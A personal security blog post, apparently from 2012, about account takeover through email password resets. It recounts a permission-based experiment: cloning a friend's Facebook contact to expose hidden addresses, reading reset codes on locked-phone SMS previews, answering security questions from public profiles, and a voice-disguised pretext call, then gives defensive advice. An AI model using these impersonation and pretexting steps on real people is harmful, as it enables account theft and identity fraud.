For everything we do online today we need an identity, a way to be contacted. You register on some forum because you need an answer, even if it's just once and just to read that answer. Afterwards you have an account there, forcing you to trust the service provider. You register on Facebook, LinkedIn, and Twitter; some of you use online banking services, dating sites, and online shopping. You know the saying that all roads lead to Rome? Well, the big knot in this thread is, you guessed it, your email address.

 

Normal working people might have one or two email addresses: a work email that belongs to the company and a private one that belongs to the user, perhaps at one of the popular web-based email services like Gmail or Hotmail. To break it down a bit: all the sensitive information in your email should really be stored in a secure vault, at home, or in a bank, because it's information that, in an attacker's hands, could turn your life into a nightmare.

 

I live in an EU country where our social security numbers aren't considered information worth protecting and can be obtained by anyone. Yes, I know: it's a huge risk. Granted, in some cases you still need some form of identification to pick up a package sent in your name, but I consider it a huge risk all the same.

 

Physically, I shred papers once I've filed them and put the files in my safe, and I destroy the remnants of important things I've read. Unfortunately, storing personal data in your email is easy and convenient. Honestly, how often do you DELETE emails anyway? And if you do, do you empty the trash right away? There's so much disk space nowadays that you don't have to care anymore. Lovely.

 

So, you set up your email account at the free hosting service, and you have to select a password. Everybody nags you nowadays to choose a strong password. Let's use 03L1ttl3&bunn13s00!, which is strong, good, and quite easy to remember. Now for the security question. Where was your mother born? What's your pet's name? What's your grandparent's profession? Most people pick one and fill it out.

 

Well, in my profession, security is defined by the weakest link; in this case, disregarding human error and focusing on the email alone, this IS the weakest link. How easy can it be? I wanted to dive into how my friends and family have set up their accounts, and how easy it is to find the necessary information, either by googling it or through a social engineering attack. This is 2012; people should be smarter, right? So, with mutual agreement obtained between myself, my friends, and my family, the experiment was about to begin.

 

A lot of my friends and former colleagues have had their identities stolen over the past two years, and the number of cases is rising sharply. It has affected some of them to the point that they can't take out loans without going through a huge hassle. And such cases rarely make it to court, even with a huge amount of evidence, including video recordings of the attackers claiming to be their victims while picking up packages at the local post office.
Why? There's just too much ground to cover, and too little manpower and competence to handle it. The victims have to file a complaint, then fax the case number and a copy of the complaint to every place where things were ordered in their name. That means blacklisting themselves in those systems, so if they ever want to shop there again, you can imagine the hassle of un-blacklisting themselves and proving that they are really who they say they are this time.

 

A good friend of mine was hiking in Thailand when someone got access to his email, which included all of his sensitive data: travel bookings, bus passes, flights, hotel reservations. The attacker even sent a couple of emails and replies, just to be funny, and then canceled the hotel reservations, the car transfers, the airplane tickets, and some of the hiking guides. A couple of days later my friend was supposed to go on a small jungle hike, just him, his camera, and a guide. The guide never showed up, and neither did his transportation to the next location.
Thanks a lot. Sure, it could have been worse, but imagine being stranded in a jungle somewhere in Thailand with no Internet. He also had to make a couple of very expensive phone calls, and ultimately he aborted his photography vacation and headed home.

 

One of my best friends uses Gmail, like many others. While trying a password restore on his account, I found an old Hotmail address, too. Why? When I asked him about it afterwards, he said he'd had the Hotmail account for about eight years, so it was nested in with everything, and his thinking was: why remove it? It could be good for going back to find old, funny things you might otherwise forget. He's not keen on security, and he didn't remember whether a secret question was set. So I needed that email address.
Let's use his Facebook profile, as a public attacker would. It came up empty; darn, he must be hiding his email. However, his friends were displayed. Let's make a fake profile based on one of his older friends. The target I chose was a girl he had gone to school with. How do I know that? She was publicly sharing a photo of the two of them in high school. Awesome. Fake profile ready, almost identical to the girl's, same photo as hers, et cetera. And: Friend Request Sent.
A lot of email vendors and public boards such as Facebook have started to implement phone verification, which is a good thing. Right? So, while waiting for an answer, I decided to run a small side experiment with my locked mobile phone.
I choose a dating site that has this feature enabled, then set up an account with mobile phone verification and an alternative email. I log out and click Forgot password? I enter my username, "IOACasanova2000," and two options pop up: mobile phone or alternative email. My phone is locked and lying on the table. I choose phone. Send. My phone vibrates and I take a look at the display: From "Unnamed Datingsite": "ZUGA22". That's all I need to reset the password.
Imagine if someone steals, or even borrows, your phone at a party, or if you're sloppy enough to leave it on a table. I don't need your PIN, at least not for that dating site. What can you do to protect yourself from this? Edit the settings so the preview shows less of the message. My phone shows three lines of every SMS; that's way too much. On some brands you can also disable SMS notifications from showing up on a locked screen at all.
Back on my screen, an instant notification: Friend Request Accepted.
I quickly check my friend’s profile and see:
hismaingmail@gmail.com
hishotmail@hotmail.com

 

I had a dog, and his name was BINGO! On to Hotmail dot com and a password reset for:
hishotmail@hotmail.com

 

The anti-bot algorithm… done…
And the secret question is active…
“What’s your mother’s maiden name”…

 

I already know the answer, but since I'm playing the attacker, I quickly check his Facebook, which shows his mother's maiden name! I type it into Hotmail and click OK….

 

New Password: this1sAsecret!123$

 

I’m halfway there….

 

Another old colleague of mine got his Hotmail hacked; he was using the simple security question "Where was your mother born?" The answer was the same city she lives in today, and that HE lives in: Malmö, a city in Sweden. The attack couldn't have been more untimely: he was on a plane, bound for the Canary Islands with his wife. After a couple of hours at the airport, the flight, and a taxi ride, he got a "Sorry, you don't have a reservation here, sir" from the clerk. His hotel booking had been canceled.

 

Most major sites are protected by advanced security appliances, and several audits are done before a site is approved for deployment, which makes it more difficult for an attacker to find vulnerabilities through direct attacks on the service itself. On the other hand, a lot of companies forget to train their support personnel, and that leaves small gaps, as does the way they handle password restoration. All these little breadcrumbs make a bun in the end, especially when combined with information collected from other vendors and their services, primarily because there is no global standard for password retrieval, nor for what should and should not be disclosed over the phone.

 

You can't rely on the vendor to protect you; YOU need to take precautions yourself, such as destroying physical papers and deleting emails containing vital information. Print out the information you need, then destroy the email. Make sure you empty the email trash folder (if your client offers one) before you log out, then file the printout and put it in your home safety box. Minimize your mistakes and the information available about you online. That way, if something should happen at your service provider, at least you know you did all you could, and you have minimized the details an attacker might get.

 

I think you've heard this one before, but it bears repeating: never use the same password twice!
Back to my friend: I entered his email address in Gmail's Forgot Password form and answered the anti-bot question.
There we go; I quickly check his Hotmail, find the Gmail password restore link, and set a new password. Done.

Now for the gold: his Facebook. Using the same method there, I gained access to his Facebook; he had Flickr as well, set to log in with Facebook. How convenient. I now own his whole online "life". There's even an account at an online electronics store; nice, and it's been approved for credit.

An attacker could change the delivery address and buy things online, and my friend would be knee-deep in trouble. There's also an iTunes account tied to his email, which would allow me to remotely erase his phones and iPads. Lucky for him, I'm not that type of attacker.

 

Why would anyone want my information? Maybe you're not that important, but consider that maybe I want access to your corporate network. I know where you're employed because of that LinkedIn group, and posting a malicious link in that group from your account is more trustworthy than a URL from a stranger. Or maybe you're good friends with one of the admins: what if I contact him from your account and ask him to reset your corporate password to something temporary?
I've tried the method on six of my friends and some of my close relatives (with permission, of course). It worked on five of them. The last one had forgotten what she'd put as her security question, so the question hadn't been answered truthfully. That saved her.
When I had a hard time finding information, I used voice-changing software on my computer to transform my voice into a girl's. A girl's voice sounds gentle and is less likely to be suspected of a hoax; that's how the mind works. Then I'd use Skype to dial the relatives, telling them that I worked for the local church's historical department, that the records about their grandfather were a bit hard to read, and that we were entering all of this into a computer so people could more easily do ancestry searches. On this particular call, what I wanted was her grandfather's profession, so I asked a couple of filler questions and slipped the real question in the middle, like the magician I am. Mundus vult decipi is Latin for "the world wants to be deceived."
In this case, it was easy.
She wasn't suspicious at all. I thanked her for her trouble and told her I would send two movie tickets as a thank you. And I did.
Another quick fix you can make today while cleaning out your email: use an email forwarder, and make sure the forwarding address itself can't be logged into. For example, in my domain there's the address "spam@xxxxxxxxx.se" that I use for registering on forums and other random sites. This address has no login of its own; mail to it is simply forwarded to my real address. An attacker trying to reset that password would get nowhere.
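To make the idea concrete, here is a minimal sketch of such a forward-only address, assuming your domain's mail is handled by a Postfix server with virtual alias maps enabled (the addresses are placeholders; your provider's mechanism may differ):

   # /etc/postfix/virtual -- forward-only alias; no mailbox or login exists for it
   # (assumes main.cf contains: virtual_alias_maps = hash:/etc/postfix/virtual)
   spam@example.se    real.mailbox@example.com

   # rebuild the lookup table and apply the change
   postmap /etc/postfix/virtual
   postfix reload

Because the address is only a rewrite rule, there is no password to reset and no inbox to break into at the provider hosting it.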
Create a new email address such as "imp.mail2@somehost.com" and use THIS address for important things, such as online shopping. Don't disclose it on any social sites or use it to email anyone; it is just a temporary container for your online shopping accounts and the password resets from those sites. Remember what I said before? Print it, delete it. And add your mobile number as a password-retrieval option to minimize the risk.
It's getting easier and easier to rely on just one source for authentication, and that means that if any link is weak, you jeopardize all of your other accounts as well. You might also pose a risk to your employer.